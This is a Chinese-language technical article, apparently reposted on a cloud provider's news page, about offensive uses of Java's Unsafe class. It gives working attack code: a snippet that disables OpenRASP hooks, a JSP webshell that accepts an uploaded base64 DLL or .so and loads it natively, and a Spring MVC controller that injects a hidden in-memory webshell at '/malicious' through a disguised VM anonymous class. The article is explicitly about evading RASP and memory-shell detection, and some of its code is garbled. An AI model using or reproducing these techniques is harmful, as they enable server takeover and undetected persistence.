您好,登錄后才能下訂單哦!
本文小編為大家詳細(xì)介紹“Java中Unsafe在安全領(lǐng)域的使用方法”,內(nèi)容詳細(xì),步驟清晰,細(xì)節(jié)處理妥當(dāng),希望這篇“Java中Unsafe在安全領(lǐng)域的使用方法”文章能幫助大家解決疑惑,下面跟著小編的思路慢慢深入,一起來學(xué)習(xí)新知識吧。
unsafe里面有很多好用的方法,比如allocateInstance可以直接創(chuàng)建實例對象,defineAnonymousClass可以創(chuàng)建一個VM匿名類(VM Anonymous Class),以及直接從內(nèi)存級別修改對象的值。
首先是獲取Unsafe對象,一般使用反射獲取Unsafe,否則會被Java安全機(jī)制攔截,代碼如下
public static Unsafe getUnsafe() throws Exception{ Class<?> aClass = Class.forName("sun.misc.Unsafe"); Constructor<?> declaredConstructor = aClass.getDeclaredConstructor(); declaredConstructor.setAccessible(true); Unsafe unsafe= (Unsafe) declaredConstructor.newInstance(); return unsafe; }
這里首先要提到的是,在jvm中,對實例的Field進(jìn)行了有規(guī)律的存儲,具體可見JVM相關(guān)知識,而通過一個偏移量可以從內(nèi)存中找到相應(yīng)的Field值。在Unsafe中獲取偏移量的方法是staticFieldOffset(Field var1)和objectFieldOffset(Field var1)這兩個方法,輸入一個Field對象后,會返回該Field在其相應(yīng)的類中的內(nèi)存偏移量是多少。通過獲得的偏移量可進(jìn)一步調(diào)用putInt、putLong、putObject等方法對實例的field進(jìn)行修改。
例如:
package com.bitterz.unsafe; import sun.misc.Unsafe; import java.lang.reflect.Constructor; import java.lang.reflect.Field; public class UnsafeTest { private int a = 1; private String string = "whoami"; public UnsafeTest(){} public void test(){ } public static void main(String[] args) throws Exception { Unsafe unsafe = getUnsafe(); UnsafeTest unsafeTest = new UnsafeTest(); // 修改int Field f = Class.forName("com.bitterz.unsafe.UnsafeTest").getDeclaredField("a"); long l = unsafe.objectFieldOffset(f); unsafe.putInt(unsafeTest, l, 9999); System.out.println(unsafeTest.a); // 修改string Field f2 = Class.forName("com.bitterz.unsafe.UnsafeTest").getDeclaredField("string"); long l2 = unsafe.objectFieldOffset(f2); unsafe.putObject(unsafeTest, l2, "bitterz"); System.out.println(unsafeTest.string); } public static Unsafe getUnsafe() throws Exception{ Class<?> aClass = Class.forName("sun.misc.Unsafe"); Constructor<?> declaredConstructor = aClass.getDeclaredConstructor(); declaredConstructor.setAccessible(true); Unsafe unsafe= (Unsafe) declaredConstructor.newInstance(); return unsafe; }
其輸出結(jié)果為
但對final和static修飾的field這種修改方法無效。另外還可以通過偏移量使用getInt()、getObject()等方法獲取實例的field值,這種方法也可以作為反射被限制時的一種繞過。
Unsafe中有個allocateInstance方法,可以無視構(gòu)造方法,直接利用類對象構(gòu)建實例,這種方法往往能夠減少反射創(chuàng)建實例時可能遇到的各種阻礙,比如類的依賴關(guān)系。
比如前面創(chuàng)建Unsafe時使用了反射,不能直接進(jìn)行創(chuàng)建,那么可以使用unsafe進(jìn)行創(chuàng)建(只是為了演示。。)
VM Anonymous Class并不等同于匿名類,這種類具有以下幾個特點(摘自https://paper.seebug.org/1785):
1、class名可以是已存在的class的名字,比如java.lang.File,即使如此也不會發(fā)生任何問題,java的動態(tài)編譯特性將會在內(nèi)存中生成名如 java.lang.File/13063602@38ed5306的class。 ---將會使類名極具欺騙性
2、該class的classloader為null。 ---在java中classloader為null的為來自BootstrapClassLoader的class,往往會被認(rèn)定為jdk自帶class
3、在JVM中存在大量動態(tài)編譯產(chǎn)生的class(多為lamada表達(dá)式生成),這種class均不會落盤,所以不落盤并不會屬于異常特征。
4、無法通過Class.forName()獲取到該class的相關(guān)內(nèi)容。 ---嚴(yán)重影響通過反射排查該類安全性的檢測工具
5、在部分jdk版本中,VM Anonymous Class甚至無法進(jìn)行restransform。 ---這也就意味著我們無法通過attach API去修復(fù)這個惡意類
6、該class在transform中的className將會是它的模板類名。 ---這將會對那些通過attach方式檢測內(nèi)存馬的工具造成極大的誤導(dǎo)性
使用方法如下
defineAnonymousClass方法的第一個參數(shù)隨便傳入一個類對象即可,第二個參數(shù)需要傳入一個類的字節(jié)碼,這里使用javassist簡單一點。第三個參數(shù)設(shè)置為null即可。
執(zhí)行后得到一個類對象,通過newInstance獲取實例,再調(diào)用了匿名類的toString方法,彈個計算器。而后輸出匿名類的類名和Unsafe的類名進(jìn)行對比,可見,用defineAnonymousClass創(chuàng)建的類名后面,會有"/xxxxxxxx",這里也算一個特征,但通過Class.forName是無法獲取到這個類的,所以下面報錯了。
用attach的方式,看看對該類的檢測,之前寫過rasp相關(guān)的筆記,所以直接拿過來用
transform里面拿到到該類后,直接報錯了,看了一下報錯日志,實際上就是在transform中返回字節(jié)碼時出問題了,因為前面也說了在部分jdk中,VM AnonymousClass是不能被retransform的,我這里用的是jdk1.8u40。但是直接結(jié)束程序有點不太好,例如插入內(nèi)存馬后,目標(biāo)使用attach機(jī)制來掃描jvm中加載的類,此時直接導(dǎo)致Web程序崩潰,業(yè)務(wù)不得提刀來殺安全:) 這個點用于內(nèi)存馬可能要慎重一下。
前面提到了,通過Unsafe可以直接修改值,因此在遇到目標(biāo)有RASP得情況下,可以考慮修改RASP的開關(guān);
try { Class clazz = Class.forName("com.baidu.openrasp.HookHandler"); Unsafe unsafe = getUnsafe(); InputStream inputStream = clazz.getResourceAsStream(clazz.getSimpleName() + ".class"); byte[] data = new byte[inputStream.available()]; inputStream.read(data); Class anonymousClass = unsafe.defineAnonymousClass(clazz, data, null); Field field = anonymousClass.getDeclaredField("enableHook"); unsafe.putObject(clazz, unsafe.staticFieldOffset(field), new AtomicBoolean(false)); } catch (Exception e) { }
或者使用rebeyond師傅提到的方法,手動構(gòu)建insturmentation對象,然后對執(zhí)行命令的類去掉RASP插樁代碼。
這里的思路來自于SummerSec師傅的文章,通過java.lang.ClassLoader$NativeLibrary#load(String, Boolean)
方法,加載一個dll文件,而dll文件中可以實現(xiàn)各種攻擊手段,例如上傳了一個jsp文件,只用于加載dll,而不同的dll實現(xiàn)了內(nèi)網(wǎng)穿透、反彈Shell、木馬和執(zhí)行命令等功能,攻擊時上傳對應(yīng)dll文件即可。
借鑒https://github.com/SummerSec/Loader/blob/main/AddDllDemo.jsp ,又稍微改了一下代碼,把上傳文件和加載dll融合到了一個jsp里面
<%@page pageEncoding="utf-8"%> <input type="file" id="fielinput" /> <img id="txshow" /> <br/>解析之后的base64數(shù)據(jù):<br/> <p id="data"></p> <head> <meta charset="utf-8"> </head> <form action="http://127.0.0.1:8080/test/AddDllDemo.jsp" method="POST"> <input type="text" name="p"/> <input type="submit" value="提交"/> </form> <script type="text/javascript"> var input = document.getElementById("fielinput"); input.addEventListener('change', readFile, false); function readFile() { var file = this.files[0]; var reader = new FileReader(); // 返回一個新的FileReader函數(shù) reader.readAsDataURL(file); reader.onload = function (e) { txshow.src = this.result; document.getElementById("data").innerText=this.result.substring(this.result.indexOf(',')+1); } } </script>> <% if(request.getMethod().equals("GET")){ }else{ String p = request.getParameter("p"); String t = request.getServletContext().getRealPath("/"); java.io.PrintWriter outp = response.getWriter(); outp.println("WebRootPath:"); outp.println(t); t = request.getServletPath(); outp.println("ServletPath:"); t = (new java.io.File(".").getAbsolutePath()); outp.println("WebServerPath:"); java.util.Random random = new java.util.Random(System.currentTimeMillis()); outp.println("if Dynamic Link Library will be auto load in uploading !!!"); t = System.getProperty("os.name").toLowerCase(); if (t.contains("windows")) { t = "C:/Windows/temp/dm" + random.nextInt(10000000) + "1.dll"; }else { t = "/tmp/dm" + random.nextInt(10000000) + "1.so"; if (p != null) { try { java.io.FileOutputStream fos = new java.io.FileOutputStream(new java.io.File(t)); fos.write(D(p)); fos.close(); N(t); outp.println("Dynamic Link Library is uploaded, and the path is: " + t); outp.println("load uploaded success !!!"); } catch (Exception e) { outp.println(e.getMessage()); } outp.flush(); outp.close(); %> <%! private void N(String t) throws Exception { Object o; Class a = Class.forName("java.lang.ClassLoader$NativeLibrary"); java.lang.reflect.Constructor c = a.getDeclaredConstructor(new Class[]{Class.class,String.class,boolean.class}); c.setAccessible(true); o = c.newInstance(Class.class,t,true); }catch (Exception e){ Class u = Class.forName("sun.misc.Unsafe"); java.lang.reflect.Constructor<?> c = u.getDeclaredConstructor(); sun.misc.Unsafe un = (sun.misc.Unsafe)c.newInstance(); o = un.allocateInstance(a); java.lang.reflect.Method method = o.getClass().getDeclaredMethod("load", String.class, boolean.class); method.setAccessible(true); method.invoke(o, t, false); private byte[] D(String p) throws Exception { Class clazz = Class.forName("sun.misc.BASE64Decoder"); return (byte[])(clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), p)); } catch (Exception var5) { Class clazz = Class.forName("java.util.Base64"); Object decoder = clazz.getMethod("getDecoder").invoke(null); return (byte[])(decoder.getClass().getMethod("decode", String.class).invoke(decoder, p));
瀏覽器訪問AddDllDemo.jsp后,選擇dll文件,并復(fù)制base64值到文本框中,點擊提交
成功彈出計算器
使用Unsafe去創(chuàng)建NativeLibrary的有點在于可以減少在java層面的調(diào)用,直接一個load方法就能實現(xiàn)native層面的代碼執(zhí)行,可以繞過RASP或終端軟件對webshell的查殺,以及java層面執(zhí)行命令時被攔截的可能。
目前這種做法有個缺點在于DLL文件必須落地,顯然落地就有可能被文件監(jiān)控察覺到。另外實現(xiàn)這種做法的還有ClassLoader#loadLibrary
和ClassLoader#loadLibrary0
,利用反射即可實現(xiàn)不再贅述。期待大師傅們搞出無文件落地的姿勢!
前面提到了使用Unsafe.defineAnonymousClass方法可以創(chuàng)建一個VM Anonymous Class,基于其各種特點,可以讓內(nèi)存馬隱藏的更深
在springmvc中,插入servlet內(nèi)存馬時,只需要傳入方法名和惡意類的實例對象,剛好適合這種Anonymous Class,pom.xml設(shè)置如下
<dependency> <groupId>org.springframework</groupId> <artifactId>spring-web</artifactId> <version>4.2.6.RELEASE</version> </dependency> <dependency> <groupId>org.springframework</groupId> <artifactId>spring-webmvc</artifactId> <version>4.2.6.RELEASE</version> </dependency> <dependency> <groupId>org.springframework</groupId> <artifactId>spring-context</artifactId> <version>4.2.6.RELEASE</version> </dependency> <dependency> <groupId>org.springframework</groupId> <artifactId>spring-test</artifactId> <version>4.2.6.RELEASE</version> </dependency> <dependency> <groupId>org.springframework</groupId> <artifactId>spring-jdbc</artifactId> <version>4.2.6.RELEASE</version> </dependency> <dependency> <groupId>org.javassist</groupId> <artifactId>javassist</artifactId> <version>3.19.0-GA</version> </dependency>
在spring_mvc中寫個controller來注入,示例代碼如下:
@ResponseBody @RequestMapping(value = "/index", method = RequestMethod.GET) public String index(HttpServletRequest request, HttpServletResponse response) throws Exception { // 準(zhǔn)備unsafe和匿名類 Class<?> aClass = Class.forName("sun.misc.Unsafe"); Constructor<?> declaredConstructor = aClass.getDeclaredConstructor(); declaredConstructor.setAccessible(true); Unsafe unsafe= (Unsafe) declaredConstructor.newInstance(); ClassPool classPool = ClassPool.getDefault(); CtClass ctClass = classPool.makeClass("java.lang.String"); CtMethod toString = CtMethod.make("public String toString(){java.lang.Runtime.getRuntime().exec(\"calc\");return null;}", ctClass); toString.setName("toString"); ctClass.addMethod(toString); byte[] bytes = ctClass.toBytecode(); Class<?> anonymousClass = unsafe.defineAnonymousClass(File.class, bytes, null); // 插入內(nèi)存馬 WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0); // 1. 從當(dāng)前上下文環(huán)境中獲得 RequestMappingHandlerMapping 的實例 bean RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class); AbstractHandlerMethodMapping abstractHandlerMethodMapping = context.getBean(AbstractHandlerMethodMapping.class); Method method = Class.forName("org.springframework.web.servlet.handler.AbstractHandlerMethodMapping").getDeclaredMethod("getMappingRegistry"); method.setAccessible(true); Object mappingRegistry = (Object) method.invoke(abstractHandlerMethodMapping); Field field = Class.forName("org.springframework.web.servlet.handler.AbstractHandlerMethodMapping$MappingRegistry").getDeclaredField("urlLookup"); field.setAccessible(true); Map urlLookup = (Map) field.get(mappingRegistry); Iterator urlIterator = urlLookup.keySet().iterator(); String injectUrlPath = "/malicious"; // 插入的url while (urlIterator.hasNext()){ String urlPath = (String) urlIterator.next(); if (injectUrlPath.equals(urlPath)){ System.out.println("URL已存在"); return "exist"; } } // 2. 通過反射獲得自定義 controller 中唯一的 Method 對象 Method method2 = anonymousClass.getDeclaredMethod("toString"); // 3. 定義訪問 controller 的 URL 地址 PatternsRequestCondition url = new PatternsRequestCondition(injectUrlPath); // 4. 定義允許訪問 controller 的 HTTP 方法(GET/POST) RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition(); // 5. 在內(nèi)存中動態(tài)注冊 controller RequestMappingInfo info = new RequestMappingInfo(url, ms, null, null, null, null, null); // InjectAnonymousClass InjectAnonymousClass = new InjectAnonymousClass("aaa"); Object o = anonymousClass.newInstance(); mappingHandlerMapping.registerMapping(info, o, method2); return "injected!"; // 這里根據(jù)注解會自動返回index.html }
啟動項目,然后訪問該controller對應(yīng)的url,結(jié)果如下
注入成功,訪問/malicious
由于惡意代碼里面只寫了彈計算器,并沒有寫返回語句,所以tomcat尋找malicious.jsp會返回404。調(diào)試模式下看一下對該url的描述
只有在beanType處顯示類名為java.lang.String/179284069
,其它地方都顯示為java.lang.String
。匿名類的類名又可以隨意設(shè)置,所以稍加修飾即可以假亂真,比如先拿到org.springframework.web.servlet.handler.AbstractHandlerMethodMapping$MappingRegistry
,遍歷其中,隨便找一個controller的類名和方法名,然后回顯一下,再給惡意類寫個一樣的package和方法名,url則根據(jù)Web應(yīng)用的規(guī)律自己編一個,這樣的話,還是能夠欺騙到根據(jù)package和方法名判斷的檢測方法,另外VM Anonymous Class沒辦法獲取到字節(jié)碼,所以也能逃過一劫。
Unsafe類還能對內(nèi)存進(jìn)行操作,在rebeyond師傅的文章-java內(nèi)存攻擊技術(shù)漫談中有大量應(yīng)用,最終可以通過內(nèi)存級別的操作,直接構(gòu)建instrumentation對象進(jìn)而修改jvm中的java代碼;或者執(zhí)行shellcode,從而繞過RASP實現(xiàn)命令執(zhí)行、文件讀寫等操作。
讀到這里,這篇“Java中Unsafe在安全領(lǐng)域的使用方法”文章已經(jīng)介紹完畢,想要掌握這篇文章的知識點還需要大家自己動手實踐使用過才能領(lǐng)會,如果想了解更多相關(guān)內(nèi)容的文章,歡迎關(guān)注億速云行業(yè)資訊頻道。
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。